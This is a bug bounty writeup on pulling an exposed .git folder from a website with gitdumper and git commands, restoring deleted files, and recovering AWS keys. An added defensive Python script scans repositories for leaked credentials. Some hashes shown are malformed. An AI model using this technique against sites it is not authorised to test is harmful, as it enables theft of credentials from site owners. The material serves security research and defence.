How .git folder can be exploited to access sensitive data
This is Satya (Security Researcher/Bug Bounty Hunter). In this writeup, I'm going to show you how I was able to exploit .git to access sensitive data of my target website. So, let's get started.
What is the .git folder?
The .git folder is where Git stores the metadata and object database for your project. This is the most important part of Git, and it is what is copied when you clone a repository from another computer. Here "object" includes "blob", "tree", "commit", and "tag".
First, you need to download the .git folder using GitTools gitdumper.
cmd : ./gitdumper https://app.example.com/.git example.com
Find the hash of the main/master branch to get to its tree, commit and blob objects.
cmd : cat .git/refs/heads/main (or) cat .git/refs/heads/master
output : da09407c30b6f984fb15e660ac80a282f61d4984
You can view the tree, commit and blob objects by using the main/master branch hash.
git show -s --pretty=raw da09407c30b6f984fb15e660ac80a282f61d4984
output :
commit da09407c30b6df87f87dd60ac80a282f61d466a
tree eb7a07fde7f8chbfdf78ffdb6a5cf989991c5a6
parent 77fbaa460d95ba8144ebn657njc2fca865a41128
To view the content of objects such as the tree, blob or parent, use the git cat-file command.
git cat-file -p eb7a07fde7f8chbfdf78ffdb6a5cf989991c5a6
output :
040000 tree 9867559d614af20026a81hjbd9345d2c409885dc0b7c54 Config
100755 blob b08kjnd8689nfdg98ycd41f538bbc574bb8acb198f8083 secret.txt
Now Let’s Exploit This :
You can view the status of all local changes. For example, if a developer deleted a file named secret.txt and committed the change, you will see the secret.txt deletion with the git status command.
The git restore command will discard any local, uncommitted changes in the corresponding files and thereby restore their last committed state.
git restore .
You will see the restored files in your target folder.
Now, manually check each file and folder for any sensitive information disclosure.
I got a folder named config. In that folder, a file named aws.php contains the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY.
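For checking your own repository before it ships, the following added example (not part of the original writeup) reads loose objects the way git cat-file does and reports blobs containing the AWS key names above, even when no current tree lists the file any more. It assumes loose objects only (packfiles are not read); the function names, the pattern and the sample repository are constructed for illustration.

```python
import hashlib, re, tempfile, zlib
from pathlib import Path

# Key names from this writeup; the pattern itself is an assumption of this example.
SECRET_RE = re.compile(rb"AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY)")

def write_loose(git_dir, kind, body):
    # Loose object = zlib(b"<type> <size>\0" + body), stored at objects/<sha[:2]>/<sha[2:]>.
    raw = kind.encode() + b" " + str(len(body)).encode() + b"\0" + body
    sha = hashlib.sha1(raw).hexdigest()
    path = Path(git_dir, "objects", sha[:2], sha[2:])
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(zlib.compress(raw))
    return sha

def read_loose(path):
    # Undo the zlib layer and split the header from the body.
    raw = zlib.decompress(Path(path).read_bytes())
    header, _, body = raw.partition(b"\0")
    return header.split(b" ")[0].decode(), body

def tree_entries(body):
    # A tree body is a run of b"<mode> <name>\0" followed by a 20-byte binary SHA-1.
    entries = []
    while body:
        head, _, rest = body.partition(b"\0")
        mode, _, name = head.partition(b" ")
        entries.append((mode.decode(), name.decode(), rest[:20].hex()))
        body = rest[20:]
    return entries

def audit(git_dir):
    # Map every blob that matches SECRET_RE to the file names any tree gives it.
    names, hits = {}, set()
    for path in Path(git_dir, "objects").glob("[0-9a-f][0-9a-f]/*"):
        kind, body = read_loose(path)
        if kind == "tree":
            for _mode, name, sha in tree_entries(body):
                names.setdefault(sha, set()).add(name)
        elif kind == "blob" and SECRET_RE.search(body):
            hits.add(path.parent.name + path.name)
    return {sha: sorted(names.get(sha, {"<unreferenced>"})) for sha in hits}

def demo():
    # Constructed repository: an old tree lists aws.php, the newest tree is empty.
    git_dir = tempfile.mkdtemp()
    blob = write_loose(git_dir, "blob", b"AWS_ACCESS_KEY_ID=EXAMPLE-PLACEHOLDER\n")
    write_loose(git_dir, "tree", b"100644 aws.php\0" + bytes.fromhex(blob))
    write_loose(git_dir, "tree", b"")  # state after the file was deleted
    return blob, audit(git_dir)
```

A hit means the credential has to be rotated and the web server must refuse requests under /.git/; deleting the file in a new commit does not remove the old blob.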
If you wanna know how to exploit AWS credentials, you can read my previous writeup: